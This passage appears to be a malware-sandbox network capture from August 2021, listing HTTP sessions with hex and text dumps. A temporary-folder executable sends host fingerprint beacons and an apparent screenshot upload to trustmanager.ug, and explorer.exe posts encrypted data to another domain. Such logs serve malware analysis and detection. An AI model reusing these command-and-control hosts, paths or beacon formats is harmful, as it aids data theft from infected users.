"-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:08.889121056 CEST	17076	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.2.3	49831	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:09.048270941 CEST	17078	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:09.074969053 CEST	17079	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:09.075011015 CEST	17079	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.2.3	49830	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:09.204499960 CEST	17080	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: atvcampingtrips.com
Aug 23, 2021 02:09:09.204504013 CEST	17080	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 46 3c e1 87 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vuF<hTQwc P5!oZN@^&fEZKQAV4`1S]7m@,?b\|_sxe
Aug 23, 2021 02:09:10.479266882 CEST	17476	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:09 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.2.3	49832	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:09.255336046 CEST	17081	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:09.281217098 CEST	17083	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:09.281234026 CEST	17083	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.2.3	49833	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:09.291332960 CEST	17083	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: trustmanager.ug Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:09.291584015 CEST	17083	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:09.291906118 CEST	17093	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:09.292223930 CEST	17096	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:09.317461967 CEST	17099	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:09.317487955 CEST	17102	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:09.317575932 CEST	17107	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:09.317594051 CEST	17110	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:09.317662001 CEST	17115	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:09:09.317692995 CEST	17116	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:09:09.317828894 CEST	17119	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:09.397367954 CEST	17179	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 